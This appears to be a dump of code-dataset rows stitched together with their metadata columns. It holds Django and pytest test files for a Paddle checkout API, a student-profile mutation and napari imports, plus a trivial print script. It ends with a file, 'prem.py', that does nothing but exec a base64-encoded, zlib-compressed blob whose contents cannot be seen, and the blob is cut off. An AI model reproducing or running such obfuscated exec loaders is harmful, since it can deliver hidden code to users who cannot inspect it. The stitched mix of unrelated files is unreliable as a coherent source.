'match_id': '3',
'ita_driver_id': '3',
'menu_id': '999',
'parameter_name': 'メッセージ',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '2',
'match_id': '1',
'ita_driver_id': '1',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '3',
'match_id': '2',
'ita_driver_id': '2',
'menu_id': '999',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
| 31.000839 | 127 | 0.528699 | 3,304 | 36,953 | 5.619552 | 0.10109 | 0.038078 | 0.030215 | 0.023375 | 0.832768 | 0.805407 | 0.793343 | 0.774977 | 0.774331 | 0.753218 | 0 | 0.086105 | 0.325549 | 36,953 | 1,191 | 128 | 31.026868 | 0.657585 | 0.0443 | 0 | 0.719128 | 0 | 0 | 0.320201 | 0.13865 | 0 | 0 | 0 | 0 | 0.03632 | 1 | 0.042373 | false | 0.009685 | 0.032688 | 0 | 0.077482 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b1366647ac45eaab05321b15aa93c88790487a9d | 87 | py | Python | pythonProject/MUNDO 3/Desafio 80 F.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 3/Desafio 80 F.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 3/Desafio 80 F.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | print('#FAZER O DESAFIO 80')
print('#FAZER O DESAFIO 80')
print('#FAZER O DESAFIO 80')
| 21.75 | 28 | 0.689655 | 15 | 87 | 4 | 0.333333 | 0.5 | 0.55 | 0.9 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.08 | 0.137931 | 87 | 3 | 29 | 29 | 0.72 | 0 | 0 | 1 | 0 | 0 | 0.655172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 15 |
b141c7cbf8939de79131a8b506d2004297f99627 | 7,238 | py | Python | tests/test_post_checkout_api.py | adamchainz/dj-paddle | 3c1479649099d45885db3f85ac8f59999780f9a6 | [
"MIT"
] | 1 | 2020-11-13T17:05:03.000Z | 2020-11-13T17:05:03.000Z | tests/test_post_checkout_api.py | FPurchess/dj-paddle | 353ce8263dd1c79bc19241ac1f58d0c91bc52ce8 | [
"MIT"
] | null | null | null | tests/test_post_checkout_api.py | FPurchess/dj-paddle | 353ce8263dd1c79bc19241ac1f58d0c91bc52ce8 | [
"MIT"
] | null | null | null | from datetime import datetime
from urllib.parse import urlencode
import pytz
from django.test import Client, TestCase
from django.urls import reverse
from djpaddle.models import Checkout
from djpaddle.utils import PADDLE_DATETIME_FORMAT
class TestPostCheckoutApi(TestCase):
def _api_request(self, url, data):
return Client().post(
url, data, content_type="application/x-www-form-urlencoded",
)
def test_checkout_api(self):
completed = True
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 204)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_next_redirect(self):
completed = True
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
redirect_url = "/someurl"
url = reverse("djpaddle:post_checkout_api")
url = "{0}?next={1}".format(url, redirect_url)
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 200)
response = resp.json()
redirect_url = "{0}?checkout={1}".format(redirect_url, data["id"])
self.assertEqual(response["redirect_url"], redirect_url)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_paddle_redirect(self):
completed = True
redirect_url = "http://example.com/checkout/success"
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
"redirect_url": redirect_url,
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 200)
response = resp.json()
redirect_url = "{0}?checkout={1}".format(redirect_url, data["id"])
self.assertEqual(response["redirect_url"], redirect_url)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_next_and_paddle_redirect(self):
completed = True
redirect_url = "http://example.com/checkout/success"
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
"redirect_url": redirect_url,
}
payload = urlencode(data)
redirect_url = "/someurl"
url = reverse("djpaddle:post_checkout_api")
url = "{0}?next={1}".format(url, redirect_url)
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 200)
response = resp.json()
redirect_url = "{0}?checkout={1}".format(redirect_url, data["id"])
self.assertEqual(response["redirect_url"], redirect_url)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_missing_not_required(self):
completed = False
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": "",
"email": "",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 204)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_missing_id(self):
data = {
"id": "",
"completed": "true",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 400)
self.assertEqual(Checkout.objects.count(), 0)
def test_checkout_api_missing_completed(self):
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 400)
self.assertEqual(Checkout.objects.count(), 0)
def test_checkout_api_bad_date(self):
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": "true",
"created_at": "baddate",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 400)
self.assertEqual(Checkout.objects.count(), 0)
| 42.327485 | 79 | 0.629594 | 785 | 7,238 | 5.638217 | 0.121019 | 0.115228 | 0.119521 | 0.032535 | 0.899458 | 0.897876 | 0.876412 | 0.876412 | 0.876412 | 0.876412 | 0 | 0.051709 | 0.235839 | 7,238 | 170 | 80 | 42.576471 | 0.748508 | 0 | 0 | 0.787097 | 0 | 0 | 0.201713 | 0.067146 | 0 | 0 | 0 | 0 | 0.219355 | 1 | 0.058065 | false | 0.064516 | 0.045161 | 0.006452 | 0.116129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
b14381da2263fb721eac100f3af81f9f25ee2bce | 3,738 | py | Python | api/tests/test_student_profile_condition.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | api/tests/test_student_profile_condition.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | api/tests/test_student_profile_condition.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | import pytest
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from db.models import ProfileState
@pytest.mark.django_db
def test_condition(login, user_student, student_condition):
user_student.student.profile_step = 6
user_student.student.save()
login(user_student)
data, errors = student_condition(user_student, ProfileState.PUBLIC)
assert errors is None
assert data is not None
assert data.get('studentProfileCondition') is not None
assert data.get('studentProfileCondition').get('success')
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.state == ProfileState.PUBLIC
assert user_student.student.profile_step == 7
@pytest.mark.django_db
def test_condition_without_login(user_student, student_condition):
data, errors = student_condition(AnonymousUser(), ProfileState.PUBLIC)
assert errors is not None
assert data is not None
assert data.get('studentProfileCondition') is None
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.state == ProfileState.INCOMPLETE
@pytest.mark.django_db
def test_condition_as_company(login, user_employee, student_condition):
login(user_employee)
data, errors = student_condition(user_employee, ProfileState.PUBLIC)
assert errors is None
assert data is not None
assert data.get('studentProfileCondition') is not None
errors = data.get('studentProfileCondition').get('errors')
assert errors is not None
assert 'type' in errors
@pytest.mark.django_db
def test_condition_invalid_step(login, user_student, student_condition):
user_student.student.profile_step = 0
user_student.student.save()
login(user_student)
data, errors = student_condition(user_student, ProfileState.PUBLIC)
assert errors is None
assert data is not None
assert data.get('studentProfileCondition') is not None
assert data.get('studentProfileCondition').get('success') is False
errors = data.get('studentProfileCondition').get('errors')
assert errors is not None
assert 'profileStep' in errors
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.profile_step == 0
@pytest.mark.django_db
def test_condition_invalid_data(login, user_student, student_condition):
user_student.student.profile_step = 6
user_student.student.save()
login(user_student)
data, errors = student_condition(user_student, 'invalid')
assert errors is None
assert data is not None
assert data.get('studentProfileCondition') is not None
assert data.get('studentProfileCondition').get('success') is False
errors = data.get('studentProfileCondition').get('errors')
assert errors is not None
assert 'state' in errors
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.state == ProfileState.INCOMPLETE
assert user_student.student.profile_step == 6
@pytest.mark.django_db
def test_condition_invalid_state(login, user_student, student_condition):
user_student.student.profile_step = 6
user_student.student.save()
login(user_student)
data, errors = student_condition(user_student, ProfileState.INCOMPLETE)
assert errors is None
assert data is not None
assert data.get('studentProfileCondition') is not None
assert data.get('studentProfileCondition').get('success') is False
errors = data.get('studentProfileCondition').get('errors')
assert errors is not None
assert 'state' in errors
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.state == ProfileState.INCOMPLETE
assert user_student.student.profile_step == 6
| 35.264151 | 75 | 0.757357 | 491 | 3,738 | 5.590631 | 0.09776 | 0.136248 | 0.104918 | 0.081967 | 0.884517 | 0.855373 | 0.83643 | 0.799271 | 0.754463 | 0.754463 | 0 | 0.002528 | 0.153558 | 3,738 | 105 | 76 | 35.6 | 0.865044 | 0 | 0 | 0.719512 | 0 | 0 | 0.108614 | 0.086142 | 0 | 0 | 0 | 0 | 0.463415 | 1 | 0.073171 | false | 0 | 0.04878 | 0 | 0.121951 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b15779157155eee5db827770ecaa46427c7749bc | 74 | py | Python | napari/_qt/_tests/test_qt_public_imports.py | mkitti/napari | 4e954d30b5a1b70c5e495db1b8f48a3bdda1ff86 | [
"BSD-3-Clause"
] | 1,345 | 2019-03-03T21:14:14.000Z | 2022-03-31T19:46:39.000Z | napari/_qt/_tests/test_qt_public_imports.py | mkitti/napari | 4e954d30b5a1b70c5e495db1b8f48a3bdda1ff86 | [
"BSD-3-Clause"
] | 3,904 | 2019-03-02T01:30:24.000Z | 2022-03-31T20:17:27.000Z | napari/_qt/_tests/test_qt_public_imports.py | mkitti/napari | 4e954d30b5a1b70c5e495db1b8f48a3bdda1ff86 | [
"BSD-3-Clause"
] | 306 | 2019-03-29T17:09:10.000Z | 2022-03-30T09:54:11.000Z | from napari.qt import * # noqa
from napari.qt.threading import * # noqa
| 24.666667 | 41 | 0.716216 | 11 | 74 | 4.818182 | 0.545455 | 0.377358 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 74 | 2 | 42 | 37 | 0.883333 | 0.121622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b19522bfd476089cdc2f9d70bd284d6fec8277db | 60,118 | py | Python | prem.py | iyanxlord/premium- | cee19ca5a4582c736f523601eb488dc44ab80434 | [
"Apache-2.0"
] | 1 | 2022-03-26T01:48:11.000Z | 2022-03-26T01:48:11.000Z | prem.py | iyanxlord/premium- | cee19ca5a4582c736f523601eb488dc44ab80434 | [
"Apache-2.0"
] | null | null | null | prem.py | iyanxlord/premium- | cee19ca5a4582c736f523601eb488dc44ab80434 | [
"Apache-2.0"
] | null | null | null | import marshal,zlib,base64
exec(zlib.decompress(base64.b64decode("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